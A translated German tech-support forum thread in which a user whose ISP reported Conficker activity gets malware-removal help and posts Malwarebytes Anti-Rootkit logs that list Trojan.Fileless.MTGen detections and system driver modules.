
Log analysis and evaluation: UPC reports: virus, worms are being sent via my IP

31.07.2017, 20:47   #1
Lost_Viking
 
Hello to everyone here on the Trojaner-Board. I've come straight from the hijack board, after noticing that it is no longer maintained.
I also opened a thread there under the name Lost_Viking
with the title UPC reports: virus, worms are being sent via my IP
Since then, however, I have uninstalled some programs and games that I no longer use, before I came across this board. So the logs there are no longer up to date.

I actually wanted to work through the first step for people seeking help here....

Unfortunately, the first problem:
As soon as I try to download "Farbar's Recovery Scan Tool", the window closes....no matter which browser. Very interesting. Is someone trying to stop me from downloading it?

I would be glad of some help, since I'm already stuck at the first step

In the meantime I have also received a reply from the UPC desk:
Quote:
Good day Mr Walser
Thank you for your feedback. The case was triggered by indications of the Conficker worm.
https://de.wikipedia.org/wiki/Conficker
Latest log entries so far (as we are on UTC+2 locally, please add 2 hours)
ip,source time UTC+0,malware family,type
80.218.222.56,2017-07-28 10:46:05Z,conficker,botnet drone
80.218.222.56,2017-07-28 10:46:05Z,conficker,botnet drone
After 28.07.2017 we have received no further indications of a security vulnerability.
Your measure was therefore successful. We have closed the case.
If we receive new indications of a security vulnerability, we will notify you again.
Many thanks for your valuable cooperation.
Kind regards
M.... G.....
Abuse Desk

31.07.2017, 21:56   #2
cosinus
hi,

Quote:
After 28.07.2017 we have received no further indications of a security vulnerability.
Your measure was therefore successful. We have closed the case.
I don't understand your request. Why should we still do anything if the case is closed?

If the problem is still there: where are the logs with the findings?
01.08.2017, 03:04   #3
Lost_Viking
 
Quote:
Quote from Lost_Viking:
As soon as I try to download "Farbar's Recovery Scan Tool", the window closes....no matter which browser. Very interesting. Is someone trying to stop me from downloading it?
Actually the suspicious behaviour of my browser when I try to download the tool. So I can't create any logs either....

I also used various sources
-NETZWELT
-Bleeping Computer
-TechSpot
etc. I click on the link...briefly see the page with the download link. But the browser is killed immediately. Never the case with other program downloads. Rather strange


I got the program in safe mode.
Started it there on the desktop, a window pops up briefly (almost impossible to read): The program is not functional

I tested both, 32+64 bit. Also with compatibility mode for Windows 7+8
Edited by Lost_Viking (01.08.2017 at 01:42)

01.08.2017, 08:57   #4
cosinus
Malwarebytes Anti-Rootkit (MBAR)

Please download Malwarebytes Anti-Rootkit and save it to your desktop.
  • Please start mbar.exe.
  • Follow the instructions on your screen as described in the guide to Malwarebytes Anti-Rootkit
  • Be sure to update the database and allow the tool to scan your system.
  • Click the CleanUp button and allow the restart.
  • During the restart MBAR will remove the objects it found, so be patient.
  • After the restart, start mbar.exe again.
  • If anything is found again, repeat the CleanUp process.
The tool will create a log file ( mbar-log-<year-month-day>.txt ) in the folder it created. Please post it here.

Do not start any other file in this folder without instructions from a helper



Reading material:
Posting in CODE tags
Attaching the log files, or even packing them into a ZIP, RAR or 7Z archive beforehand, makes my work massively harder.
Even if the logs are too large for one post, I ask you to post the logs directly and, if necessary, spread over several posts.
To put the log files in a CODE box, proceed as follows:
  • Select the entire log file (usually works with CTRL+A) and copy it to the clipboard with CTRL+C.
  • In the editor, click the # symbol. Two bracketed tags appear: [CODE] [/CODE].
  • Place the cursor between the CODE tags and press CTRL+V.
  • Click Advanced/Preview to check whether you did it correctly. If everything is right ... click Reply.

01.08.2017, 13:06   #5
Lost_Viking
 
Thanks for the quick help. I was a bit uneasy yesterday because my suspicion of a trojan had grown stronger.

Above all because I was able to run the FRST65 exe shortly after startup. After about 7 seconds the program is closed by something else, which prevents it from starting.

I then got Trojan Remover.
It also noticed 2 suspicious processes:
Edit: they are the same processes that mbar.exe also noticed

I hope I haven't destroyed any useful traces with this intervention.

------------------

Ran MBAR according to the instructions. During the process Antivir also blocked a suspicious registry entry.

Code:
Malwarebytes Anti-Rootkit BETA 1.9.3.1001
www.malwarebytes.org

Database version:
  main:    v2017.08.01.04
  rootkit: v2017.05.27.01

Windows 10 x64 NTFS
Internet Explorer 11.483.15063.0
M***** W***** :: SILENTDRAGON [administrator]

01.08.2017 12:18:05
mbar-log-2017-08-01 (12-18-05).txt

Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled: 
Objects scanned: 309854
Time elapsed: 8 minute(s), 43 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 0
(No malicious items detected)

Registry Values Detected: 2
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|^Yfbopxo (Trojan.Fileless.MTGen) -> Data:  -> Delete on reboot. [2107daae04a5d5618807cdf128daee12]
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|^Ogfitotar (Trojan.Fileless.MTGen) -> Data:  -> Delete on reboot. [13152464c2e75ed8dbb4ba04d032ea16]

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 1
C:\Users\Martin Walser\AppData\Local\b95cd\92de9.bat (Trojan.Fileless.MTGen) -> Delete on reboot. [76b2e5a37138b77f16c5ca7cfc045ba5]

Physical Sectors Detected: 0
(No malicious items detected)

(end)
         
The second pass no longer reported anything suspicious

Edit: FRST64.exe would work now. But this time I'll wait for your instructions


Edited by Lost_Viking (01.08.2017 at 13:19)

01.08.2017, 13:31   #6
cosinus
Who, pray tell, is supposed to make anything out on those postage stamps?

What are you supposed to do with MBAR when it has found something?

01.08.2017, 13:59   #7
Lost_Viking
 
Sorry. Attach the log file if something is found. Better to read everything.
Code:
---------------------------------------
Malwarebytes Anti-Rootkit BETA 1.09.3.1001

(c) Malwarebytes Corporation 2011-2012

OS version: 10.0.9200 Windows 10 x64

Account is Administrative

Internet Explorer version: 11.483.15063.0

File system is: NTFS
Disk drives: C:\ DRIVE_FIXED, F:\ DRIVE_FIXED, G:\ DRIVE_FIXED
CPU speed: 3.300000 GHz
Memory total: 17069985792, free: 11603292160

Downloaded database version: v2017.08.01.04
Downloaded database version: v2017.05.27.01
Downloaded database version: v2017.07.17.01
=======================================
Initializing...
Driver version: 0.3.0.4
------------ Kernel report ------------
     08/01/2017 12:17:29
------------ Loaded modules -----------
\SystemRoot\system32\ntoskrnl.exe
\SystemRoot\system32\hal.dll
\SystemRoot\system32\kd.dll
\SystemRoot\system32\mcupdate_GenuineIntel.dll
\SystemRoot\System32\drivers\msrpc.sys
\SystemRoot\System32\drivers\ksecdd.sys
\SystemRoot\System32\drivers\werkernel.sys
\SystemRoot\System32\drivers\CLFS.SYS
\SystemRoot\System32\drivers\tm.sys
\SystemRoot\system32\PSHED.dll
\SystemRoot\system32\BOOTVID.dll
\SystemRoot\System32\drivers\FLTMGR.SYS
\SystemRoot\System32\drivers\clipsp.sys
\SystemRoot\System32\drivers\cmimcext.sys
\SystemRoot\System32\drivers\ntosext.sys
\SystemRoot\system32\CI.dll
\SystemRoot\System32\drivers\cng.sys
\SystemRoot\system32\drivers\Wdf01000.sys
\SystemRoot\system32\drivers\WDFLDR.SYS
\SystemRoot\system32\drivers\SleepStudyHelper.sys
\SystemRoot\System32\Drivers\acpiex.sys
\SystemRoot\System32\Drivers\WppRecorder.sys
\SystemRoot\System32\drivers\ACPI.sys
\SystemRoot\System32\drivers\WMILIB.SYS
\SystemRoot\System32\drivers\intelpep.sys
\SystemRoot\system32\drivers\WindowsTrustedRT.sys
\SystemRoot\System32\drivers\WindowsTrustedRTProxy.sys
\SystemRoot\System32\drivers\pcw.sys
\SystemRoot\System32\drivers\msisadrv.sys
\SystemRoot\System32\drivers\pci.sys
\SystemRoot\System32\drivers\vdrvroot.sys
\SystemRoot\system32\drivers\pdc.sys
\SystemRoot\system32\drivers\CEA.sys
\SystemRoot\System32\drivers\partmgr.sys
\SystemRoot\System32\drivers\spaceport.sys
\SystemRoot\System32\drivers\volmgr.sys
\SystemRoot\System32\drivers\volmgrx.sys
\SystemRoot\System32\drivers\mountmgr.sys
\SystemRoot\System32\drivers\iaStorA.sys
\SystemRoot\System32\drivers\storport.sys
\SystemRoot\System32\drivers\EhStorClass.sys
\SystemRoot\System32\drivers\fileinfo.sys
\SystemRoot\System32\Drivers\Wof.sys
\SystemRoot\System32\Drivers\NTFS.sys
\SystemRoot\System32\Drivers\Fs_Rec.sys
\SystemRoot\system32\drivers\ndis.sys
\SystemRoot\system32\drivers\NETIO.SYS
\SystemRoot\System32\Drivers\ksecpkg.sys
\SystemRoot\System32\drivers\tcpip.sys
\SystemRoot\System32\drivers\fwpkclnt.sys
\SystemRoot\System32\drivers\wfplwfs.sys
\SystemRoot\system32\DRIVERS\avdevprot.sys
\SystemRoot\System32\DRIVERS\fvevol.sys
\SystemRoot\System32\drivers\volume.sys
\SystemRoot\System32\drivers\volsnap.sys
\SystemRoot\System32\Drivers\SmartDefragDriver.sys
\SystemRoot\System32\drivers\rdyboost.sys
\SystemRoot\System32\Drivers\mup.sys
\SystemRoot\system32\drivers\iorate.sys
\SystemRoot\System32\drivers\disk.sys
\SystemRoot\System32\drivers\CLASSPNP.SYS
\SystemRoot\System32\Drivers\crashdmp.sys
\SystemRoot\System32\drivers\cdrom.sys
\SystemRoot\system32\drivers\filecrypt.sys
\SystemRoot\system32\drivers\tbs.sys
\SystemRoot\System32\Drivers\Null.SYS
\SystemRoot\System32\Drivers\Beep.SYS
\SystemRoot\System32\drivers\BasicDisplay.sys
\SystemRoot\System32\drivers\watchdog.sys
\SystemRoot\System32\drivers\dxgkrnl.sys
\SystemRoot\System32\drivers\vmbkmclr.sys
\SystemRoot\System32\drivers\BasicRender.sys
\SystemRoot\System32\Drivers\Npfs.SYS
\SystemRoot\System32\Drivers\Msfs.SYS
\SystemRoot\system32\DRIVERS\tdx.sys
\SystemRoot\system32\DRIVERS\TDI.SYS
\SystemRoot\System32\DRIVERS\netbt.sys
\SystemRoot\system32\drivers\afd.sys
\SystemRoot\System32\drivers\vwififlt.sys
\SystemRoot\System32\drivers\pacer.sys
\SystemRoot\system32\drivers\netbios.sys
\SystemRoot\system32\DRIVERS\avkmgr.sys
\SystemRoot\system32\DRIVERS\avipbb.sys
\SystemRoot\system32\DRIVERS\rdbss.sys
\SystemRoot\system32\drivers\nsiproxy.sys
\SystemRoot\System32\drivers\npsvctrig.sys
\SystemRoot\System32\drivers\mssmbios.sys
\??\C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS
\SystemRoot\System32\drivers\gpuenergydrv.sys
\SystemRoot\System32\Drivers\dfsc.sys
\SystemRoot\system32\DRIVERS\ahcache.sys
\SystemRoot\system32\drivers\SaiBus.sys
\SystemRoot\System32\DriverStore\FileRepository\compositebus.inf_amd64_de4c68ea4fb1be53\CompositeBus.sys
\SystemRoot\System32\drivers\kdnic.sys
\SystemRoot\System32\drivers\umbus.sys
\SystemRoot\System32\drivers\intelppm.sys
\SystemRoot\System32\drivers\wmiacpi.sys
\SystemRoot\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_24ddebfb518b5a55\nvlddmkm.sys
\SystemRoot\System32\drivers\HDAudBus.sys
\SystemRoot\System32\drivers\portcls.sys
\SystemRoot\System32\drivers\drmk.sys
\SystemRoot\System32\drivers\ks.sys
\SystemRoot\System32\drivers\USBXHCI.SYS
\SystemRoot\system32\drivers\ucx01000.sys
\SystemRoot\System32\drivers\TeeDriverW8x64.sys
\SystemRoot\System32\drivers\usbehci.sys
\SystemRoot\System32\drivers\USBPORT.SYS
\SystemRoot\System32\drivers\e2xw10x64.sys
\SystemRoot\System32\drivers\asmtxhci.sys
\SystemRoot\system32\DRIVERS\AVerPL33_x64.sys
\SystemRoot\system32\DRIVERS\USBD.SYS
\SystemRoot\system32\drivers\ksthunk.sys
\SystemRoot\System32\drivers\ETDSMBus.sys
\SystemRoot\system32\drivers\nvvad64v.sys
\SystemRoot\System32\drivers\nvvhci.sys
\SystemRoot\System32\drivers\NdisVirtualBus.sys
\SystemRoot\System32\drivers\swenum.sys
\SystemRoot\system32\drivers\LGBusEnum.sys
\SystemRoot\system32\drivers\LGJoyXlCore.sys
\SystemRoot\System32\drivers\rdpbus.sys
\SystemRoot\System32\drivers\SaiMini.sys
\SystemRoot\System32\drivers\HIDCLASS.SYS
\SystemRoot\System32\drivers\HIDPARSE.SYS
\SystemRoot\System32\drivers\usbhub.sys
\SystemRoot\system32\drivers\nvhda64v.sys
\SystemRoot\System32\drivers\UsbHub3.sys
\SystemRoot\system32\drivers\RTKVHD64.sys
\SystemRoot\system32\drivers\MBfilt64.sys
\SystemRoot\System32\drivers\asmthub3.sys
\SystemRoot\System32\drivers\kbdhid.sys
\SystemRoot\System32\drivers\kbdclass.sys
\SystemRoot\System32\drivers\mouhid.sys
\SystemRoot\System32\drivers\mouclass.sys
\SystemRoot\System32\drivers\usbccgp.sys
\SystemRoot\System32\drivers\hidusb.sys
\SystemRoot\system32\DRIVERS\lvuvc64.sys
\SystemRoot\system32\drivers\usbaudio.sys
\SystemRoot\system32\DRIVERS\lvrs64.sys
\SystemRoot\System32\win32k.sys
\SystemRoot\System32\win32kfull.sys
\SystemRoot\System32\win32kbase.sys
\SystemRoot\System32\Drivers\dump_diskdump.sys
\SystemRoot\System32\Drivers\dump_iaStorA.sys
\SystemRoot\System32\Drivers\dump_dumpfve.sys
\SystemRoot\System32\drivers\dxgmms2.sys
\SystemRoot\System32\drivers\monitor.sys
\SystemRoot\System32\TSDDD.dll
\SystemRoot\system32\drivers\mmcss.sys
\SystemRoot\system32\drivers\luafv.sys
\SystemRoot\system32\drivers\wcifs.sys
\SystemRoot\system32\drivers\storqosflt.sys
\SystemRoot\system32\DRIVERS\avgntflt.sys
\SystemRoot\System32\drivers\registry.sys
\SystemRoot\system32\drivers\lltdio.sys
\SystemRoot\system32\drivers\mslldp.sys
\SystemRoot\system32\drivers\rspndr.sys
\SystemRoot\System32\DRIVERS\wanarp.sys
\SystemRoot\system32\drivers\ndisuio.sys
\SystemRoot\system32\DRIVERS\nwifi.sys
\SystemRoot\system32\drivers\HTTP.sys
\SystemRoot\system32\DRIVERS\bowser.sys
\SystemRoot\system32\DRIVERS\mrxsmb.sys
\SystemRoot\system32\DRIVERS\mrxsmb20.sys
\SystemRoot\System32\drivers\mpsdrv.sys
\SystemRoot\system32\DRIVERS\avnetflt.sys
\??\C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys
\SystemRoot\system32\DRIVERS\mrxsmb10.sys
\SystemRoot\System32\DRIVERS\srvnet.sys
\SystemRoot\system32\drivers\Ndu.sys
\SystemRoot\system32\drivers\peauth.sys
\SystemRoot\System32\drivers\tcpipreg.sys
\SystemRoot\System32\DRIVERS\srv2.sys
\SystemRoot\System32\DRIVERS\srv.sys
\SystemRoot\system32\drivers\WudfPf.sys
\SystemRoot\System32\drivers\condrv.sys
\SystemRoot\System32\drivers\tunnel.sys
\SystemRoot\system32\drivers\LGVirHid.sys
\SystemRoot\System32\drivers\rdpvideominiport.sys
\SystemRoot\System32\cdd.dll
\??\C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys
\??\C:\WINDOWS\system32\drivers\mbamchameleon.sys
\??\C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys
----------- End -----------
Scan Interrupted
Done!

Scan started
Database versions:
  main:    v2017.08.01.04
  rootkit: v2017.05.27.01

Scan was aborted.
=======================================

Scan started
Database versions:
  main:    v2017.08.01.04
  rootkit: v2017.05.27.01

<<<2>>>
Physical Sector Size: 512
Drive: 0, DevicePointer: 0xffffbe8989be9060, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
--------- Disk Stack ------
DevicePointer: 0xffffbe8989b9f9f0, DeviceName: Unknown, DriverName: \Driver\partmgr\
DevicePointer: 0xffffbe8989be9060, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
DevicePointer: 0xffffbe898588ae40, DeviceName: Unknown, DriverName: \Driver\ACPI\
DevicePointer: 0xffffbe89884981e0, DeviceName: \Device\00000036\, DriverName: \Driver\iaStorA\
------------ End ----------
Alternate DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
Upper DeviceData: 0x0, 0x0, 0x0
Lower DeviceData: 0x0, 0x0, 0x0
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
<<<2>>>
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
Scanning drivers directory: C:\WINDOWS\SYSTEM32\drivers...
Done!
Drive 0
This is a System drive
Scanning MBR on drive 0...
Inspecting partition table:
MBR Signature: 55AA
Disk Signature: BE291492

Partition information:

    Partition 0 type is Primary (0x7)
    Partition is ACTIVE.
    Partition starts at LBA: 2048  Numsec = 716800
    Partition is bootable
    Partition file system is NTFS

    Partition 1 type is Primary (0x7)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 718848  Numsec = 498475696
    Partition is not bootable
    Partition file system is NTFS

    Partition 2 type is Other (0x27)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 499195904  Numsec = 919552
    Partition is not bootable
    Partition file system is NTFS

    Partition 3 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0
    Partition is not bootable

Disk Size: 256060514304 bytes
Sector size: 512 bytes

Done!
Physical Sector Size: 512
Drive: 1, DevicePointer: 0xffffbe8989be8060, DeviceName: \Device\Harddisk1\DR1\, DriverName: \Driver\Disk\
--------- Disk Stack ------
DevicePointer: 0xffffbe8989b9d9f0, DeviceName: Unknown, DriverName: \Driver\partmgr\
DevicePointer: 0xffffbe8989be8060, DeviceName: \Device\Harddisk1\DR1\, DriverName: \Driver\Disk\
DevicePointer: 0xffffbe898588aa10, DeviceName: Unknown, DriverName: \Driver\ACPI\
DevicePointer: 0xffffbe8988496060, DeviceName: \Device\00000037\, DriverName: \Driver\iaStorA\
------------ End ----------
Alternate DeviceName: \Device\Harddisk1\DR1\, DriverName: \Driver\Disk\
Upper DeviceData: 0x0, 0x0, 0x0
Lower DeviceData: 0x0, 0x0, 0x0
Drive 1
Scanning MBR on drive 1...
Inspecting partition table:
This drive is a GPT Drive.
MBR Signature: 55AA
Disk Signature: 0

GPT Protective MBR Partition information:

    Partition 0 type is EFI-GPT (0xee)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 1  Numsec = 4294967295

    Partition 1 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0

    Partition 2 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0

    Partition 3 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0

GPT Partition information:

    GPT Header Signature 4546492050415254
    GPT Header Revision 65536 Size 92 CRC 2062005913
    GPT Header CurrentLba = 1 BackupLba 15628064767
    GPT Header FirstUsableLba 34  LastUsableLba 15628064734
    GPT Header Guid d80aac34-b589-4897-a2e0-164b73895348
    GPT Header Contains 128 partition entries starting at LBA 2
    GPT Header Partition entry size = 128

    Backup GPT header Signature 4546492050415254
    Backup GPT header Revision 65536 Size 92 CRC 2062005913
    Backup GPT header CurrentLba = 15628064767 BackupLba 1
    Backup GPT header FirstUsableLba 34  LastUsableLba 15628064734
    Backup GPT header Guid d80aac34-b589-4897-a2e0-164b73895348
    Backup GPT header Contains 128 partition entries starting at LBA 15628064735
    Backup GPT header Partition entry size = 128

    Partition 0 Type e3c9e316-b5c-4db8-817d-f92df0215ae
    Partition ID 73a4163a-cae1-48f4-bd5c-dcb8e3d7543
    FirstLBA 34  Last LBA 262177
    Attributes 0
    Partition Name         Microsoft reserved partition

    Partition 1 Type ebd0a0a2-b9e5-4433-87c0-68b6b72699c7
    Partition ID f19d7015-d86c-497e-989-1722d24df3b
    FirstLBA 264192  Last LBA 7814162431
    Attributes 0
    Partition Name                 Basic data partition

    Partition 2 Type ebd0a0a2-b9e5-4433-87c0-68b6b72699c7
    Partition ID a8af2a8a-ee54-438d-9d2a-9d9225f73da9
    FirstLBA 7814162432  Last LBA 15628060671
    Attributes 0
    Partition Name                 Basic data partition

Disk Size: 8001569161216 bytes
Sector size: 512 bytes

Done!
File "C:\Users\Martin Walser\AppData\Local\Comms\UnistoreDB\store.vol" is sparse (flags = 32768)
File "C:\Windows\System32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat" is sparse (flags = 32768)
Infected: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|^Yfbopxo --> [Trojan.Fileless.MTGen]
Infected: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|^Ogfitotar --> [Trojan.Fileless.MTGen]
Infected: C:\Users\Martin Walser\AppData\Local\b95cd\92de9.bat --> [Trojan.Fileless.MTGen]
Scan finished
Creating System Restore point...
Cleaning up...
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Removal scheduling successful. System shutdown needed.
System shutdown occurred
=======================================


---------------------------------------
Malwarebytes Anti-Rootkit BETA 1.09.3.1001

(c) Malwarebytes Corporation 2011-2012

OS version: 10.0.9200 Windows 10 x64

Account is Administrative

Internet Explorer version: 11.483.15063.0

File system is: NTFS
Disk drives: C:\ DRIVE_FIXED, F:\ DRIVE_FIXED, G:\ DRIVE_FIXED
CPU speed: 3.300000 GHz
Memory total: 17069985792, free: 13223682048

=======================================
Initializing...
Driver version: 0.3.0.4
------------ Kernel report ------------
     08/01/2017 12:40:39
------------ Loaded modules -----------
\SystemRoot\system32\ntoskrnl.exe
\SystemRoot\system32\hal.dll
\SystemRoot\system32\kd.dll
\SystemRoot\system32\mcupdate_GenuineIntel.dll
\SystemRoot\System32\drivers\msrpc.sys
\SystemRoot\System32\drivers\ksecdd.sys
\SystemRoot\System32\drivers\werkernel.sys
\SystemRoot\System32\drivers\CLFS.SYS
\SystemRoot\System32\drivers\tm.sys
\SystemRoot\system32\PSHED.dll
\SystemRoot\system32\BOOTVID.dll
\SystemRoot\System32\drivers\FLTMGR.SYS
\SystemRoot\System32\drivers\clipsp.sys
\SystemRoot\System32\drivers\cmimcext.sys
\SystemRoot\System32\drivers\ntosext.sys
\SystemRoot\system32\CI.dll
\SystemRoot\System32\drivers\cng.sys
\SystemRoot\system32\drivers\Wdf01000.sys
\SystemRoot\system32\drivers\WDFLDR.SYS
\SystemRoot\system32\drivers\SleepStudyHelper.sys
\SystemRoot\System32\Drivers\acpiex.sys
\SystemRoot\System32\Drivers\WppRecorder.sys
\SystemRoot\System32\drivers\ACPI.sys
\SystemRoot\System32\drivers\WMILIB.SYS
\SystemRoot\System32\drivers\intelpep.sys
\SystemRoot\system32\drivers\WindowsTrustedRT.sys
\SystemRoot\System32\drivers\WindowsTrustedRTProxy.sys
\SystemRoot\system32\drivers\CLASSPNP.SYS
\SystemRoot\System32\drivers\imofugc.sys
\SystemRoot\System32\drivers\pcw.sys
\SystemRoot\System32\drivers\msisadrv.sys
\SystemRoot\System32\drivers\pci.sys
\SystemRoot\System32\drivers\vdrvroot.sys
\SystemRoot\system32\drivers\pdc.sys
\SystemRoot\system32\drivers\CEA.sys
\SystemRoot\System32\drivers\partmgr.sys
\SystemRoot\System32\drivers\spaceport.sys
\SystemRoot\System32\drivers\volmgr.sys
\SystemRoot\System32\drivers\volmgrx.sys
\SystemRoot\System32\drivers\mountmgr.sys
\SystemRoot\System32\drivers\iaStorA.sys
\SystemRoot\System32\drivers\storport.sys
\SystemRoot\System32\drivers\EhStorClass.sys
\SystemRoot\System32\drivers\fileinfo.sys
\SystemRoot\System32\Drivers\Wof.sys
\SystemRoot\System32\Drivers\NTFS.sys
\SystemRoot\System32\Drivers\Fs_Rec.sys
\SystemRoot\system32\drivers\ndis.sys
\SystemRoot\system32\drivers\NETIO.SYS
\SystemRoot\System32\Drivers\ksecpkg.sys
\SystemRoot\System32\drivers\tcpip.sys
\SystemRoot\System32\drivers\fwpkclnt.sys
\SystemRoot\System32\drivers\wfplwfs.sys
\SystemRoot\system32\DRIVERS\avdevprot.sys
\SystemRoot\System32\DRIVERS\fvevol.sys
\SystemRoot\System32\drivers\volume.sys
\SystemRoot\System32\drivers\volsnap.sys
\SystemRoot\System32\Drivers\SmartDefragDriver.sys
\SystemRoot\System32\drivers\rdyboost.sys
\SystemRoot\System32\Drivers\mup.sys
\SystemRoot\system32\drivers\iorate.sys
\SystemRoot\System32\drivers\disk.sys
\SystemRoot\System32\Drivers\crashdmp.sys
\SystemRoot\System32\drivers\cdrom.sys
\SystemRoot\system32\drivers\filecrypt.sys
\SystemRoot\system32\drivers\tbs.sys
\SystemRoot\System32\Drivers\Null.SYS
\SystemRoot\System32\Drivers\Beep.SYS
\SystemRoot\System32\drivers\BasicDisplay.sys
\SystemRoot\System32\drivers\watchdog.sys
\SystemRoot\System32\drivers\dxgkrnl.sys
\SystemRoot\System32\drivers\vmbkmclr.sys
\SystemRoot\System32\drivers\BasicRender.sys
\SystemRoot\System32\Drivers\Npfs.SYS
\SystemRoot\System32\Drivers\Msfs.SYS
\SystemRoot\system32\DRIVERS\tdx.sys
\SystemRoot\system32\DRIVERS\TDI.SYS
\SystemRoot\System32\DRIVERS\netbt.sys
\SystemRoot\system32\drivers\afd.sys
\SystemRoot\System32\drivers\vwififlt.sys
\SystemRoot\System32\drivers\pacer.sys
\SystemRoot\system32\drivers\netbios.sys
\SystemRoot\system32\DRIVERS\avkmgr.sys
\SystemRoot\system32\DRIVERS\avipbb.sys
\SystemRoot\system32\DRIVERS\rdbss.sys
\SystemRoot\system32\drivers\nsiproxy.sys
\SystemRoot\System32\drivers\npsvctrig.sys
\SystemRoot\System32\drivers\mssmbios.sys
\??\C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS
\SystemRoot\System32\drivers\gpuenergydrv.sys
\SystemRoot\System32\Drivers\dfsc.sys
\SystemRoot\system32\DRIVERS\ahcache.sys
\SystemRoot\system32\drivers\SaiBus.sys
\SystemRoot\System32\DriverStore\FileRepository\compositebus.inf_amd64_de4c68ea4fb1be53\CompositeBus.sys
\SystemRoot\System32\drivers\kdnic.sys
\SystemRoot\System32\drivers\umbus.sys
\SystemRoot\System32\drivers\intelppm.sys
\SystemRoot\System32\drivers\wmiacpi.sys
\SystemRoot\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_24ddebfb518b5a55\nvlddmkm.sys
\SystemRoot\System32\drivers\HDAudBus.sys
\SystemRoot\System32\drivers\portcls.sys
\SystemRoot\System32\drivers\drmk.sys
\SystemRoot\System32\drivers\ks.sys
\SystemRoot\System32\drivers\USBXHCI.SYS
\SystemRoot\system32\drivers\ucx01000.sys
\SystemRoot\System32\drivers\TeeDriverW8x64.sys
\SystemRoot\System32\drivers\usbehci.sys
\SystemRoot\System32\drivers\USBPORT.SYS
\SystemRoot\System32\drivers\e2xw10x64.sys
\SystemRoot\System32\drivers\asmtxhci.sys
\SystemRoot\system32\DRIVERS\AVerPL33_x64.sys
\SystemRoot\system32\DRIVERS\USBD.SYS
\SystemRoot\system32\drivers\ksthunk.sys
\SystemRoot\System32\drivers\ETDSMBus.sys
\SystemRoot\system32\drivers\nvvad64v.sys
\SystemRoot\System32\drivers\nvvhci.sys
\SystemRoot\System32\drivers\NdisVirtualBus.sys
\SystemRoot\System32\drivers\swenum.sys
\SystemRoot\system32\drivers\LGBusEnum.sys
\SystemRoot\system32\drivers\LGJoyXlCore.sys
\SystemRoot\System32\drivers\rdpbus.sys
\SystemRoot\System32\drivers\SaiMini.sys
\SystemRoot\System32\drivers\HIDCLASS.SYS
